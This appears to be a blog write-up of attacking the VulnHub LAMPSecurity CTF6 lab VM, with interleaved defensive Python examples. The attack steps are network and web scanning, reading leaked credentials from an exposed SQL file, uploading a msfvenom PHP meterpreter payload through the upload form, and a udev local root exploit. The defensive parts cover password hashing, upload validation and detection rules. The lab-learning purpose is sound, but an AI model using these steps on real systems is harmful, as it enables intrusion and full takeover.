I recently learned about VulnHub, a site where you can download and attack demo machines that others have shared. It is very useful if you want to learn about security or sharpen your existing skills. In this post I target the LAMPSecurity: CTF6 machine. Setup is simple: I downloaded the VM, converted it to qcow2 format and fired it up with KVM.
To start off I wanted to see what ports and services were running, so I decided to run a scan to gather more information.
The first issue is that the machine gets its address via DHCP, so I first need to determine its IP address.
    # nmap -sP 192.168.1.0/24
    Starting Nmap 7.12 ( https://nmap.org ) at 2016-04-22 21:03 EDT
    Nmap scan report for 192.168.1.211
    Host is up (0.00011s latency).
    MAC Address: 52:54:00:2E:EF:25 (QEMU virtual NIC)
    Nmap scan report for 192.168.1.1
    Host is up.
    Nmap done: 256 IP addresses (2 hosts up) scanned in 6.38 seconds
I know the gateway is 192.168.1.1, so the only other live host, 192.168.1.211, must be the target machine. With the address known I can scan its ports to see what is open.
    # nmap -sS -sV 192.168.1.211
    Nmap scan report for 192.168.1.211
    Host is up (0.00013s latency).
    Not shown: 991 closed ports
    PORT     STATE SERVICE  VERSION
    22/tcp   open  ssh      OpenSSH 4.3 (protocol 2.0)
    80/tcp   open  http     Apache httpd 2.2.3 ((CentOS))
    110/tcp  open  pop3     Dovecot pop3d
    111/tcp  open  rpcbind  2 (RPC #100000)
    143/tcp  open  imap     Dovecot imapd
    443/tcp  open  ssl/http Apache httpd 2.2.3 ((CentOS))
    993/tcp  open  ssl/imap Dovecot imapd
    995/tcp  open  ssl/pop3 Dovecot pop3d
    3306/tcp open  mysql    MySQL 5.0.45
    MAC Address: 52:54:00:2E:EF:25 (QEMU virtual NIC)
The host is running Apache, so I decided to scan the website with nikto to see if there are any interesting pages available.
    # nikto -h http://192.168.1.211/
    - Nikto v2.1.6
    ---------------------------------------------------------------------------
    + Target IP:          192.168.1.211
    + Target Hostname:    192.168.1.211
    + Target Port:        80
    + Start Time:         2016-04-22 21:25:05 (GMT-4)
    ---------------------------------------------------------------------------
    + Server: Apache/2.2.3 (CentOS)
    + Cookie PHPSESSID created without the httponly flag
    + Retrieved x-powered-by header: PHP/5.2.6
    + The anti-clickjacking X-Frame-Options header is not present.
    + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
    + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
    + Apache/2.2.3 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
    + Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
    + Web Server returns a valid response with junk HTTP methods, this may cause false positives.
    + OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
    + OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
    + OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
    + OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
    + OSVDB-3268: /files/: Directory indexing found.
    + OSVDB-3092: /files/: This might be interesting...
    + OSVDB-3268: /lib/: Directory indexing found.
    + OSVDB-3092: /lib/: This might be interesting...
    + Cookie roundcube_sessid created without the httponly flag
    + OSVDB-3092: /mail/: This might be interesting...
    + OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
    + Server leaks inodes via ETags, header found with file /phpmyadmin/ChangeLog, inode: 97164, size: 35791, mtime: Wed Oct 19 17:47:44 2095
    + OSVDB-3092: /phpmyadmin/ChangeLog: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
    + OSVDB-3268: /sql/: Directory indexing found.
    + OSVDB-3092: /manual/: Web server manual found.
    + OSVDB-3268: /icons/: Directory indexing found.
    + OSVDB-3268: /manual/images/: Directory indexing found.
    + OSVDB-3268: /docs/: Directory indexing found.
    + OSVDB-3233: /icons/README: Apache default file found.
    + /phpmyadmin/: phpMyAdmin directory found
    + OSVDB-3092: /phpmyadmin/Documentation.html: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
    + 8496 requests: 0 error(s) and 29 item(s) reported on remote host
    + End Time:           2016-04-22 21:25:14 (GMT-4) (9 seconds)
    ---------------------------------------------------------------------------
    + 1 host(s) tested
One directory stands out: /sql/. I visited it and, lo and behold, it contains a file db.sql that I was able to open and read, and it holds some interesting data.
    CREATE database IF NOT EXISTS cms;
    use mysql;
    GRANT ALL PRIVILEGES ON cms.* to 'sql_account'@'localhost' IDENTIFIED BY 'sql_password';
    use cms;
    DROP TABLE IF EXISTS user;
    DROP TABLE IF EXISTS event;
    DROP TABLE IF EXISTS log;
    CREATE TABLE IF NOT EXISTS user (
        user_id int not null auto_increment primary key,
        user_username varchar(50) not null,
        user_password varchar(32) not null
    );
    CREATE TABLE IF NOT EXISTS event (
        event_id int not null auto_increment primary key,
        event_title varchar(255) not null,
        event_body text,
        event_file varchar(255) default null,
        user_id int not null,
        event_hits int default 0
    );
    CREATE TABLE IF NOT EXISTS log (
        log_id int not null auto_increment primary key,
        log_ip varchar(20),
        log_referer varchar(255),
        log_useragent varchar(255)
    );
    DELETE FROM user;
    DELETE FROM event;
    DELETE FROM log;
    INSERT INTO user SET user_id = 1, user_username='admin', user_password=md5('adminpass');
    ...
The most interesting part is that the admin user's password appears in plain text inside the md5() call. Naturally I tried logging in to the web interface with it, and the credentials worked!
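The schema above stores user_password as a VARCHAR(32) filled by MySQL's md5(), which is an unsalted hex digest: every user with the same password gets the same stored value, and a leaked script like db.sql hands the password over directly. The following is an added example, not code from the CTF application or this post, contrasting that scheme with salted, iterated hashing; the `algo$iterations$salt$digest` storage format is this example's own convention.

```python
import hashlib
import hmac
import os
from typing import Callable, Optional

# Added example, not code from the CTF or the original post. The CMS schema
# stores user_password as a VARCHAR(32) produced by MySQL's md5(), i.e. an
# unsalted MD5 hex digest. The functions below contrast that with a salted,
# iterated hash that the column would have to be widened to hold.

def legacy_md5_hash(password: str) -> str:
    """What md5('adminpass') in db.sql produces: one fixed digest per password."""
    return hashlib.md5(password.encode()).hexdigest()

def pbkdf2_hash(password: str, salt: Optional[bytes] = None, iterations: int = 600_000) -> str:
    """Hardened storage: random per-user salt plus PBKDF2-HMAC-SHA256. The
    parameters travel with the digest so the iteration count can be raised later.
    Storage format (an assumption of this example): algo$iterations$salt_hex$digest_hex."""
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest.hex()}"

def pbkdf2_verify(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count; compare in constant time."""
    try:
        algo, iterations, salt_hex, digest_hex = stored.split("$")
    except ValueError:
        return False
    if algo != "pbkdf2_sha256":
        return False
    candidate = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations)
    )
    return hmac.compare_digest(candidate.hex(), digest_hex)

def is_unsalted(hasher: Callable[[str], str], password: str = "adminpass") -> bool:
    """True when hashing the same password twice yields the same stored value,
    which is what lets a precomputed table or one leaked hash be reused across users."""
    return hasher(password) == hasher(password)
```

Note that the hardened value is far longer than 32 characters, so the `user_password varchar(32)` column in the schema would need to grow before the application could store it.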
Next I clicked the Add Event tab; it lets me upload files, so this is possibly a situation where I can upload a reverse shell. First, however, I wanted to make sure there was some way to access the files after upload. Looking back at the nikto scan there was a /files/ directory, and visiting it in the browser shows that this is where the application stores uploaded files.
With that known I fired up a Kali VM and generated a reverse shell script.
    root@kali:~# msfvenom -p php/meterpreter/bind_tcp R > out.php
    No platform was selected, choosing Msf::Module::Platform::PHP from the payload
    No Arch selected, selecting Arch: php from the payload
    No encoder or badchars specified, outputting raw payload
    Payload size: 1188 bytes
Now I just uploaded the script to the site using the form and confirmed it shows up in the files directory.
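The upload form accepted a .php file under its original name and placed it under the web root at /files/, where Apache would execute it on request. As an added example (not code from the CTF application or this post), the Python below shows the validation such a handler needs: an extension allow-list, a magic-byte check against the claimed type, rejection of double extensions and embedded script markers, and a server-chosen stored name. It also includes a sweep over an existing upload directory that reports files carrying script content whatever their extension says. The allowed types, marker list and sample directory contents are this example's own assumptions.

```python
import os
import re
import secrets
import tempfile
from pathlib import Path
from typing import List, Optional, Tuple

# Added example, not code from the CTF application or the original post. The
# "Add Event" form evidently stored whatever was uploaded, under its original
# name, below the web root at /files/, so a .php upload became executable.

# Allow-list (an assumption of this example): accepted extensions and the
# leading bytes a genuine file of that type must start with.
ALLOWED = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "pdf": b"%PDF-",
}
# Byte markers that have no business inside an image or document upload.
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<script", b"<%")

def naive_accept(filename: str) -> bool:
    """The behaviour the post relied on: any name, any content, stored as-is."""
    return bool(filename)

def validate_upload(filename: str, content: bytes, max_bytes: int = 5_000_000) -> Tuple[bool, str, Optional[str]]:
    """Return (accepted, reason, server_chosen_name).

    Rejects empty or oversize files, names with more than one extension
    (shell.php.png), extensions outside the allow-list, content whose magic
    bytes do not match the claimed type, and content carrying script markers.
    """
    if len(content) == 0 or len(content) > max_bytes:
        return False, "size", None
    base = os.path.basename(filename)          # drop any client-supplied path
    parts = base.lower().split(".")
    if len(parts) != 2 or not re.fullmatch(r"[a-z0-9_-]{1,64}", parts[0]):
        return False, "name", None
    ext = parts[1]
    if ext not in ALLOWED:
        return False, "extension", None
    if not content.startswith(ALLOWED[ext]):
        return False, "magic", None
    if any(marker in content for marker in SCRIPT_MARKERS):
        return False, "embedded-script", None
    # The server picks the stored name; the client controls neither path nor extension.
    return True, "ok", f"{secrets.token_hex(16)}.{ext}"

def sweep_upload_dir(directory: Path) -> List[str]:
    """Integrity check for an existing upload directory: report every file whose
    first 64 KiB contain a script marker, regardless of what its extension says."""
    flagged = []
    for path in sorted(directory.rglob("*")):
        if path.is_file():
            head = path.read_bytes()[:65536]
            if any(marker in head for marker in SCRIPT_MARKERS):
                flagged.append(path.name)
    return flagged

def build_sample_upload_dir() -> Path:
    """Constructed sample directory: a clean PNG, a PDF, and a PNG-named file
    that actually holds PHP source (the pattern the post's upload exercised)."""
    root = Path(tempfile.mkdtemp(prefix="files-"))
    (root / "clean.png").write_bytes(ALLOWED["png"] + b"\x00" * 32)
    (root / "evil.png").write_bytes(b"<?php echo 'not an image'; ?>")
    (root / "notes.pdf").write_bytes(ALLOWED["pdf"] + b"1.4 ...")
    return root
```

Validation at ingest is only half of it: the stored files should live outside the document root (or in a directory where the web server has script execution disabled) so that even a file that slips through is served as bytes rather than run.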
All that was left now was to start up the listener on the Metasploit VM and wait for a connection. As soon as I clicked the reverse-shell.php file, I saw a meterpreter shell open on the Metasploit console! Success!
    root@kali:~# msfconsole
    msf > use exploit/multi/handler
    msf exploit(handler) > set payload php/meterpreter/bind_tcp
    payload => php/meterpreter/bind_tcp
    msf exploit(handler) > set RHOST 192.168.1.211
    RHOST => 192.168.1.211
    msf exploit(handler) > exploit
    [*] Started bind handler
    [*] Starting the payload handler...
    [*] Sending stage (33068 bytes) to 192.168.1.211
    [*] Meterpreter session 1 opened (192.168.1.131:41387 -> 192.168.1.211:4444) at 2016-04-22 03:29:08 -0400
    meterpreter > getuid
    Server username: apache (48)
Excellent, now I needed some local vulnerability that I could exploit to take over the system. After some research I found a udev exploit that this system was apparently vulnerable to (https://www.exploit-db.com/exploits/8478/).
I created the exploit file on the system, set its execute bit, and ran it.
    ./a.sh 422
    /usr/bin/ld: cannot open output file /tmp/udev: Permission denied
    collect2: ld returned 1 exit status
    suid.c: In function 'main':
    suid.c:3: warning: incompatible implicit declaration of built-in function 'execl'
    /usr/bin/ld: cannot open output file /tmp/suid: Permission denied
    collect2: ld returned 1 exit status
    # id
    uid=0(root) gid=0(root) groups=48(apache)
    # touch pwn
    # ls -l
    total 40
    -rw------- 1 root root  1045 Jun  2  2009 anaconda-ks.cfg
    -rw-r--r-- 1 root root 17219 Jun  2  2009 install.log
    -rw-r--r-- 1 root root  3419 Jun  2  2009 install.log.syslog
    -rw-r--r-- 1 root root     0 Apr 23 19:08 pwn
So there we go, the udev exploit was enough to compromise this server!
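From the defender's side, the escalation above leaves a distinctive trail: the web server account (uid 48) spawning a shell and then the compiler and linker, binaries executed out of /tmp, and a root process that still carries the apache group (the `id` output shows groups=48(apache)). As an added example, not part of the original post, the Python below runs those rules over constructed execve records in a simplified auditd-style key=value form; the records, the field names used and the tool lists are this example's own assumptions, not logs captured from the CTF VM.

```python
import re
from dataclasses import dataclass
from typing import Dict, List

# Added example, not code from the original post. Detection rules for the
# privilege-escalation pattern the post walks through: the httpd account
# compiling code, executing from /tmp, and ending up as root.

APACHE_UID = 48                                # the account meterpreter ran as
BUILD_TOOLS = {"gcc", "cc", "ld", "collect2", "as", "make"}
SHELLS = {"sh", "bash", "dash"}
SCRATCH_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")

# Constructed sample records in a simplified auditd-style key=value layout
# (not captured from the CTF VM). gid=48 on the uid=0 lines stands in for the
# lingering apache group the post's `id` output shows.
SAMPLE_LOG = """\
type=SYSCALL syscall=execve success=yes uid=48 gid=48 comm="httpd" exe="/usr/sbin/httpd"
type=SYSCALL syscall=execve success=yes uid=48 gid=48 comm="sh" exe="/bin/sh"
type=SYSCALL syscall=execve success=yes uid=48 gid=48 comm="gcc" exe="/usr/bin/gcc"
type=SYSCALL syscall=execve success=yes uid=48 gid=48 comm="ld" exe="/usr/bin/ld"
type=SYSCALL syscall=execve success=yes uid=0 gid=48 comm="suid" exe="/tmp/suid"
type=SYSCALL syscall=execve success=yes uid=0 gid=48 comm="sh" exe="/bin/sh"
type=SYSCALL syscall=execve success=yes uid=1000 gid=1000 comm="gcc" exe="/usr/bin/gcc"
type=SYSCALL syscall=execve success=yes uid=0 gid=0 comm="cron" exe="/usr/sbin/cron"
"""

@dataclass
class Alert:
    line_no: int
    rule: str
    detail: str

FIELD = re.compile(r'(\w+)=("[^"]*"|\S+)')

def parse_record(line: str) -> Dict[str, str]:
    """Split key=value pairs; quoted values lose their quotes."""
    return {k: v.strip('"') for k, v in FIELD.findall(line)}

def detect(log_text: str) -> List[Alert]:
    """Apply the four rules to every successful execve record."""
    alerts: List[Alert] = []
    for n, line in enumerate(log_text.splitlines(), 1):
        r = parse_record(line)
        if r.get("syscall") != "execve" or r.get("success") != "yes":
            continue
        uid, gid = int(r["uid"]), int(r["gid"])
        comm, exe = r["comm"], r["exe"]
        if uid == APACHE_UID and comm in BUILD_TOOLS:
            alerts.append(Alert(n, "webserver-compiles", f"{comm} run as uid {uid}"))
        if uid == APACHE_UID and comm in SHELLS:
            alerts.append(Alert(n, "webserver-shell", f"{comm} run as uid {uid}"))
        if exe.startswith(SCRATCH_DIRS):
            alerts.append(Alert(n, "exec-from-scratch", exe))
        if uid == 0 and gid == APACHE_UID:
            alerts.append(Alert(n, "root-keeps-webserver-gid", f"{exe} uid=0 gid={gid}"))
    return alerts

if __name__ == "__main__":
    for a in detect(SAMPLE_LOG):
        print(f"line {a.line_no}: {a.rule}: {a.detail}")
```

The noisiest of these rules in a real fleet is the compiler one; a web server host that never builds software can treat it as high confidence, while a developer box cannot. Mounting /tmp with `noexec` and keeping build tools off production web hosts removes two of the four signals entirely.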
If you found this post interesting, stay tuned: I plan on doing more in the future.